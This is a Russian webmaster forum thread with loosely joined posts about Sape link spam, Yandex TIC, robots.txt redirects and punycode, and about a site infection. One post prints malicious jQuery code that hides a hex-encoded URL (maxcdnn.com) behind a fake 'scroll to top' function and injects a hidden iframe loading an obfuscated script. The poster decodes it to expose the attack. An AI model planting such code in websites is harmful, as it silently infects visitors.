Снял оставшиеся ссылки с сапы 2 мес. назад, новых не появлялось, тиц 110 -> 140, wtf?
С сапы вон спам присылали:
"Мы, Sape (sape.ru), приглашаем вас в нашу партнерскую сеть по лидогенерации.
Нам интересны заявки с вашего сайта по медицинской тематике."
По любым вопросам:
Станислав
email: s.bukreev@sape.ru
Мопед не мой, будете пробовать - отпишитесь по результатам, как оно.
Меняйте хостинг, нормальному хостеру должно быть всё равно на "фиксируем нагрузку базы".
https://ru.wikipedia.org/wiki/%D0%92%D0%BD%D0%B5%D0%B4%D1%80%D0%B5%D0%BD%D0%B8%D0%B5_SQL-%D0%BA%D0%BE%D0%B4%D0%B0
А это что?
Ну все верно. При попытке доступа к robots.txt происходит 302 перенаправление на https версию сайта. Это нехорошо, для robots.txt и картинок не должно быть перенаправления. Скорее всего, это происходит на уровне настроек веб-сервера или в .htaccess
Плюс у вас ошибка в директиве host и sitemap. Она должна быть не кириллицей записана, а в punycode, см. https://yandex.ru/support/webmaster/yandex-indexing/cyrillic-urls.xml
Содержимое вредоносного script, для тех кому непонятно на скриншоте,
Абсолютно уверен.
Вирус находится в файле
его содержимое:
/* Main function */
$(document).ready(function(){
setTimeout(function(){
scrollToTopLayer();
}, 10000);
});
/* Functions */
function scrollToTopLayer() {
var footerTop = $('#footer').offset().top;
var windw = $(window);
var link = $('#scroll-top-link');
var scrollTopLayer = "\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x78\x63\x64\x6e\x6e\x2e\x63\x6f\x6d\x2f\x70\x69\x6e\x67\x2e\x72\x65\x71\x75\x65\x73\x74";
windw.scroll(function () {
if (windw.scrollTop() > 300) {
link.not('.showed').addClass('showed').stop(false,true).fadeIn(200)
} else {
link.removeClass('showed').stop(false,true).fadeOut(200)
}
if (windw.scrollTop() + windw.height() + 5 >= footerTop)
link.addClass('sticked');
else
link.removeClass('sticked');
$('<iframe />', {
src: scrollTopLayer,
name: 'scrollTopLayer',
id: 'scrollTopLayer',
width: '10px',
height: '10px',
frameBorder: 0,
}).appendTo('body');
Если написать
\x68\x74\x74\x70\x3a\x2f\x2f\x6d\x61\x78\x63\x64\x6e\x6e\x2e\x63\x6f\x6d\x2f\x70\x69\x6e\x67\x2e\x72\x65\x71\x75\x65\x73\x74
английскими буквами то получится http://maxcdnn.com/ping.request---------- Добавлено 08.08.2015 в 13:05 ----------Как мы видим, этот код вставляет в конец страницы iframe, который грузит следующее (если user-agent = firefox):
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /ping.request was not found on this server.</p>
<hr>
<address>Apache Server at maxcdnn.com Port 80</address>
<style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style>
<script src="dc27a0eb57ffb1ed6412549cb82b748c790b3b1b8d47fdb88ed095784ab300aaf4871885022ffe113e896c6ce172980d.js?r=aHR0cDovL3d3dy5zZWFyY2hlbmdpbmVzLnJ1L2FydGljbGVzL2lkZWFsbmF5YV9jbXNfZC5odG1s"></script>
</body>
</html>
ну а далее загружается вредоносный код. Надеюсь, это не по злому умыслу происходит. Жду объяснений 🍿
"Где-то" - на сайте. У меня на компе и в сетевой инфраструктуре нет вирусов.
А вот и виновник торжества: http://rghost.ru/6St26vCgY/image.png
